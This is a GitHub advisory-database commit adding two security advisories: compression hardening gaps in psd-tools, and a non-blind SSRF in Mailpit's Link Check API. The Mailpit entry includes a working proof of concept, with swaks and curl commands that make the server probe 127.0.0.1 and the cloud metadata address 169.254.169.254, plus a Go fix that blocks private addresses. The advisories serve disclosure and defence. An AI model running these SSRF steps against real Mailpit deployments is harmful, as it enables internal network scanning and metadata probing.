Skip to content

Commit acef694

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-24p2-j2jr-386w GHSA-mpf7-p9x7-96r3
1 parent 468f626 commit acef694

File tree

2 files changed

+146
-0
lines changed

2 files changed

+146
-0
lines changed

advisories/github-reviewed/2026/02/GHSA-24p2-j2jr-386w/GHSA-24p2-j2jr-386w.json

Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-24p2-j2jr-386w",
4+
"modified": "2026-02-26T15:20:51Z",
5+
"published": "2026-02-26T15:20:51Z",
6+
"aliases": [
7+
"CVE-2026-27809"
8+
],
9+
"summary": "psd-tools: Compression module has unguarded zlib decompression, missing dimension validation, and hardening gaps",
10+
"details": "## Summary\n\nA security review of the `psd_tools.compression` module (conducted against the `fix/invalid-rle-compression` branch, commits `7490ffa`–`2a006f5`) identified the following pre-existing issues. The two findings introduced and **fixed** by those commits (Cython buffer overflow, `IndexError` on lone repeat header) are excluded from this report.\n\n---\n\n## Findings\n\n### 1. Unguarded `zlib.decompress` — ZIP bomb / memory exhaustion (Medium)\n\n**Location**: `src/psd_tools/compression/__init__.py`, lines 159 and 162\n\n```python\nresult = zlib.decompress(data) # Compression.ZIP\ndecompressed = zlib.decompress(data) # Compression.ZIP_WITH_PREDICTION\n```\n\n`zlib.decompress` is called without a `max_length` cap. A crafted PSD file containing a ZIP-compressed channel whose compressed payload expands to gigabytes would exhaust process memory before any limit is enforced. The RLE path is not vulnerable to this because the decoder pre-allocates exactly `row_size × height` bytes; the ZIP path has no equivalent ceiling.\n\n**Impact**: Denial-of-service / OOM crash when processing untrusted PSD files.\n\n**Suggested mitigation**: Pass a reasonable `max_length` to `zlib.decompress`, derived from the expected `width * height * depth // 8` byte count already computed in `decompress()`.\n\n---\n\n### 2. No upper-bound validation on image dimensions before allocation (Low)\n\n**Location**: `src/psd_tools/compression/__init__.py`, lines 138 and 193\n\n```python\nlength = width * height * max(1, depth // 8) # decompress()\nrow_size = max(width * depth // 8, 1) # decode_rle()\n```\n\nNeither `width`, `height`, nor `depth` are range-checked before these values drive memory allocation. The PSD format (version 2 / PSB) permits dimensions up to 300,000 × 300,000 pixels; a 4-channel 32-bit image at that size would require ~144 TB to hold. While the OS/Python allocator will reject such a request, there is no early, explicit guard that produces a clean, user-facing error.\n\n**Impact**: Uncontrolled allocation attempt from a malformed or adversarially crafted PSB file; hard crash rather than a recoverable error.\n\n**Suggested mitigation**: Validate `width`, `height`, and `depth` against known PSD/PSB limits before entering decompression, and raise a descriptive `ValueError` early.\n\n---\n\n### 3. `assert` used as a runtime integrity check (Low)\n\n**Location**: `src/psd_tools/compression/__init__.py`, line 170\n\n```python\nassert len(result) == length, \"len=%d, expected=%d\" % (len(result), length)\n```\n\nThis assertion can be silently disabled by running the interpreter with `-O` (or `-OO`), which strips all `assert` statements. If the assertion ever becomes relevant (e.g., after future refactoring), disabling it would allow a length mismatch to propagate silently into downstream image compositing.\n\n**Impact**: Loss of an integrity guard in optimised deployments.\n\n**Suggested mitigation**: Replace with an explicit `if` + `raise ValueError(...)`.\n\n---\n\n### 4. `cdef int` indices vs. `Py_ssize_t size` type mismatch in Cython decoder (Low)\n\n**Location**: `src/psd_tools/compression/_rle.pyx`, lines 18–20\n\n```cython\ncdef int i = 0\ncdef int j = 0\ncdef int length = data.shape[0]\n```\n\nAll loop indices are C `signed int` (32-bit). The `size` parameter is `Py_ssize_t` (64-bit on modern platforms). The comparison `j < size` promotes `j` to `Py_ssize_t`, but if `j` wraps due to a row size exceeding `INT_MAX` (~2.1 GB), the resulting comparison is undefined behaviour in C. In practice, row sizes are bounded by PSD/PSB dimension limits and are unreachable at this scale; however, the mismatch is a latent defect if the function is ever called directly with large synthetic inputs.\n\n**Impact**: Theoretical infinite loop or UB at >2 GB row sizes; not reachable from standard PSD/PSB parsing.\n\n**Suggested mitigation**: Change `cdef int i`, `j`, `length` to `cdef Py_ssize_t`.\n\n---\n\n### 5. Silent data degradation not surfaced to callers (Informational)\n\n**Location**: `src/psd_tools/compression/__init__.py`, lines 144–157\n\nThe tolerant RLE decoder (introduced in `2a006f5`) replaces malformed channel data with zero-padded (black) pixels and emits a `logger.warning`. This is the correct trade-off over crashing, but the warning is only observable if the caller has configured a log handler. The public `PSDImage` API does not surface channel-level decode failures to the user in any other way.\n\n**Impact**: A user parsing a silently corrupt file gets a visually wrong image with no programmatic signal to check.\n\n**Suggested mitigation**: Consider exposing a per-channel decode-error flag or raising a distinct warning category that users can filter or escalate via the `warnings` module.\n\n---\n\n### 6. `encode()` zero-length return type inconsistency in Cython (Informational)\n\n**Location**: `src/psd_tools/compression/_rle.pyx`, lines 66–67\n\n```cython\nif length == 0:\n return data # returns a memoryview, not an explicit std::string\n```\n\nAll other return paths return an explicit `cdef string result`. This path returns `data` (a `const unsigned char[:]` memoryview) and relies on Cython's implicit coercion to `bytes`. It is functionally equivalent today but is semantically inconsistent and fragile if Cython's coercion rules change in a future version.\n\n**Impact**: Potential silent breakage in future Cython versions; not a current security issue.\n\n**Suggested mitigation**: Replace `return data` with `return result` (the already-declared empty `string`).\n\n---\n\n## Environment\n\n- Branch: `fix/invalid-rle-compression`\n- Reviewed commits: `7490ffa`, `2a006f5`\n- Python: 3.x (Cython extension compiled for CPython)",
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "psd-tools"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.12.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/psd-tools/psd-tools/security/advisories/GHSA-24p2-j2jr-386w"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27809"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/psd-tools/psd-tools/commit/6c0a78f195b5942757886a1863793fd5946c1fb1"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/psd-tools/psd-tools"
54+
},
55+
{
56+
"type": "WEB",
57+
"url": "https://github.com/psd-tools/psd-tools/releases/tag/v1.12.2"
58+
}
59+
],
60+
"database_specific": {
61+
"cwe_ids": [
62+
"CWE-190",
63+
"CWE-409",
64+
"CWE-617",
65+
"CWE-704",
66+
"CWE-755",
67+
"CWE-789"
68+
],
69+
"severity": "MODERATE",
70+
"github_reviewed": true,
71+
"github_reviewed_at": "2026-02-26T15:20:51Z",
72+
"nvd_published_at": "2026-02-26T00:16:26Z"
73+
}
74+
}

advisories/github-reviewed/2026/02/GHSA-mpf7-p9x7-96r3/GHSA-mpf7-p9x7-96r3.json

Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-mpf7-p9x7-96r3",
4+
"modified": "2026-02-26T15:18:46Z",
5+
"published": "2026-02-26T15:18:46Z",
6+
"aliases": [
7+
"CVE-2026-27808"
8+
],
9+
"summary": "Mailpit is Vulnerable to Server-Side Request Forgery (SSRF) via Link Check API",
10+
"details": "### Summary\nThe Link Check API (/api/v1/message/{ID}/link-check) is vulnerable to Server-Side Request Forgery (SSRF). The server performs HTTP HEAD requests to every URL found in an email without validating target hosts or filtering private/internal IP addresses. The response returns status codes and status text per link, making this a non-blind SSRF. In the default configuration (no authentication on SMTP or API), this is fully exploitable remotely with zero user interaction.\n\nThis is the same class of vulnerability that was fixed in the HTML Check API (CVE-2026-23845 / GHSA-6jxm-fv7w-rw5j) and the\nscreenshot proxy (CVE-2026-21859 / GHSA-8v65-47jx-7mfr), but the Link Check code path was not included in either fix.\n\n### Details\nThe doHead() function in https://github.com/axllent/mailpit/blob/v1.29.0/internal/linkcheck/status.go#L59-L98 creates a plain http.Transport{} and http.Client with no DialContext hook or IP validation:\n\n```\n func doHead(link string, followRedirects bool) (int, error) {\n timeout := time.Duration(10 * time.Second)\n tr := &http.Transport{}\n // ...\n client := http.Client{\n Timeout: timeout,\n Transport: tr,\n // ...\n }\n req, err := http.NewRequest(\"HEAD\", link, nil)\n // ...\n res, err := client.Do(req) // No IP validation — requests any URL\n return res.StatusCode, nil\n }\n```\n\n The call chain is:\n\n 1. GET /api/v1/message/{ID}/link-check hits LinkCheck() in\n https://github.com/axllent/mailpit/blob/v1.29.0/server/apiv1/other.go#L84\n 2. Which calls linkcheck.RunTests() in https://github.com/axllent/mailpit/blob/v1.29.0/internal/linkcheck/main.go#L16\n 3. Which extracts all URLs from the email's HTML (<a href>, <img src>, <link href>) and text body, then passes them to\n getHTTPStatuses() in https://github.com/axllent/mailpit/blob/v1.29.0/internal/linkcheck/status.go#L14\n 4. Which spawns goroutines calling doHead() for each URL with no filtering\n\n There is no check anywhere in this path to block requests to loopback (127.0.0.0/8), private (10.0.0.0/8, 172.16.0.0/12,\n 192.168.0.0/16), link-local (169.254.0.0/16), or IPv6 equivalents (::1, fc00::/7, fe80::/10).\n \n### PoC\nPrerequisites: Mailpit running with default settings (no auth flags). A listener on 127.0.0.1:8081 simulating an internal service.\n\n Step 1 — Start a listener to prove the SSRF:\n\n` python3 -m http.server 8081 --bind 127.0.0.1\n`\n\n Step 2 — Send a crafted email via SMTP:\n\n```\n swaks --to recipient@example.com \\\n --from attacker@example.com \\\n --server localhost:1025 \\\n --header \"Content-Type: text/html\" \\\n --body '<html><body><a href=\"http://127.0.0.1:8081/ssrf-proof\">click</a><a\n href=\"http://169.254.169.254/latest/meta-data/\">metadata</a></body></html>'\n```\n\n Step 3 — Get the message ID:\n\n` curl -s http://localhost:8025/api/v1/messages?limit=1 | jq -r '.messages[0].ID'\n`\n Or use the shorthand ID latest.\n\nStep 4 — Trigger the link check:\n\n` curl -s http://localhost:8025/api/v1/message/latest/link-check | jq .\n`\n \nExpected result:\n\n - The Python HTTP server on port 8081 logs a HEAD /ssrf-proof request from Mailpit.\n - The API response contains the status code and status text for each internal target:\n\n```\n {\n \"Errors\": 0,\n \"Links\": [\n {\"URL\": \"http://127.0.0.1:8081/ssrf-proof\", \"StatusCode\": 200, \"Status\": \"OK\"},\n {\"URL\": \"http://169.254.169.254/latest/meta-data/\", \"StatusCode\": 200, \"Status\": \"OK\"}\n ]\n }\n```\n\n\n-- This behavior can be identified by creating a email txt file as \n\n```\ncat email.txt > \nFrom: sender@example.com\nTo: recipient@example.com\nSubject: Email Subject\n\nThis is the body of the email.\nIt can contain multiple lines of text.\nhttp://localhost:8408\n```\n\n- Start a Python server on port 8408\n\n- execute the command `mailpit sendmail < email.txt ` \n\n- Observe a request to your python server and link status on the UI as OK\n\n\n The attacker now knows both internal services are reachable and gets their exact HTTP status codes, this allows internal port scanning\n\n### Impact\nWho is impacted: Any Mailpit deployment where an attacker can both send email (SMTP) and access the API. This includes the default configuration, which binds both services to all interfaces with no authentication.\n\n What an attacker can do:\n\n - Internal network scanning — Enumerate hosts and open ports on the internal network by reading status codes and error messages\n (connection refused vs. timeout vs. 200 OK).\n - Cloud metadata access — Reach cloud provider metadata endpoints (169.254.169.254) and infer sensitive information from response codes.\n - Service fingerprinting — Identify what services run on internal hosts from their HTTP status codes and response behavior.\n - Bypass network segmentation — Use the Mailpit server's network position to reach hosts that are not directly accessible to the attacker.\n\n This is a non-blind SSRF: the attacker gets direct, structured feedback (status code + status text) for every URL, making\n exploitation straightforward without any timing or side-channel inference.\n\n### Remediation\nThen standard Go library can be used to identify a local address being requested and deny it. \n\n```\nfunc isBlockedIP(ip net.IP) bool {\n return ip.IsLoopback() ||\n ip.IsPrivate() ||\n ip.IsLinkLocalUnicast() ||\n ip.IsLinkLocalMulticast() ||\n ip.IsUnspecified() ||\n ip.IsMulticast()\n }\n\n - IsLoopback() — 127.0.0.0/8, ::1\n - IsPrivate() — 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, fc00::/7\n - IsLinkLocalUnicast() — 169.254.0.0/16, fe80::/10 (covers cloud metadata 169.254.169.254)\n - IsLinkLocalMulticast() — 224.0.0.0/24, ff02::/16\n - IsUnspecified() — 0.0.0.0, ::\n - IsMulticast() — 224.0.0.0/4, ff00::/8\n```\n\n And the safe dialer that uses it:\n\n``` \n func safeDialContext(dialer *net.Dialer) func(ctx context.Context, network, address string) (net.Conn, error) {\n return func(ctx context.Context, network, address string) (net.Conn, error) {\n host, port, err := net.SplitHostPort(address)\n if err != nil {\n return nil, err\n }\n\n ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)\n if err != nil {\n return nil, err\n }\n\n for _, ip := range ips {\n if isBlockedIP(ip.IP) {\n return nil, fmt.Errorf(\"blocked request to private/reserved address: %s (%s)\", host, ip.\n }\n }\n\n return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))\n }\n }\n```\n\n Then the doHead() change — replace the bare transport with one that uses the safe dialer, and re-validate URLs on\n redirect hops:\n\n```\n func doHead(link string, followRedirects bool) (int, error) {\n if !isValidLinkURL(link) {\n return 0, fmt.Errorf(\"invalid URL: %s\", link)\n }\n\n dialer := &net.Dialer{\n Timeout: 5 * time.Second,\n KeepAlive: 30 * time.Second,\n }\n\n tr := &http.Transport{\n DialContext: safeDialContext(dialer),\n }\n\n if config.AllowUntrustedTLS {\n tr.TLSClientConfig = &tls.Config{InsecureSkipVerify: true} // #nosec\n }\n\n client := http.Client{\n Timeout: 10 * time.Second,\n Transport: tr,\n CheckRedirect: func(req *http.Request, via []*http.Request) error {\n if len(via) >= 3 {\n return errors.New(\"too many redirects\")\n }\n if !followRedirects {\n return http.ErrUseLastResponse\n }\n if !isValidLinkURL(req.URL.String()) {\n return fmt.Errorf(\"blocked redirect to invalid URL: %s\", req.URL)\n }\n return nil\n },\n }\n\n req, err := http.NewRequest(\"HEAD\", link, nil)\n if err != nil {\n logger.Log().Errorf(\"[link-check] %s\", err.Error())\n return 0, err\n }\n\n req.Header.Set(\"User-Agent\", \"Mailpit/\"+config.Version)\n\n res, err := client.Do(req)\n if err != nil {\n if res != nil {\n return res.StatusCode, err\n }\n return 0, err\n }\n\n return res.StatusCode, nil\n }\n\n func isValidLinkURL(str string) bool {\n u, err := url.Parse(str)\n return err == nil && (u.Scheme == \"http\" || u.Scheme == \"https\") && u.Hostname() != \"\"\n }\n\n```\nThis fix should mitigate the reported SSRF.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/axllent/mailpit"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.29.2"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.29.1"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/axllent/mailpit/security/advisories/GHSA-mpf7-p9x7-96r3"
45+
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27808"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/axllent/mailpit/commit/10ad4df8cc0cd9e51dea1b4410009545eef7fbf5"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/axllent/mailpit"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/axllent/mailpit/releases/tag/v1.29.2"
61+
}
62+
],
63+
"database_specific": {
64+
"cwe_ids": [
65+
"CWE-918"
66+
],
67+
"severity": "MODERATE",
68+
"github_reviewed": true,
69+
"github_reviewed_at": "2026-02-26T15:18:46Z",
70+
"nvd_published_at": "2026-02-26T00:16:26Z"
71+
}
72+
}

0 commit comments

Comments
 (0)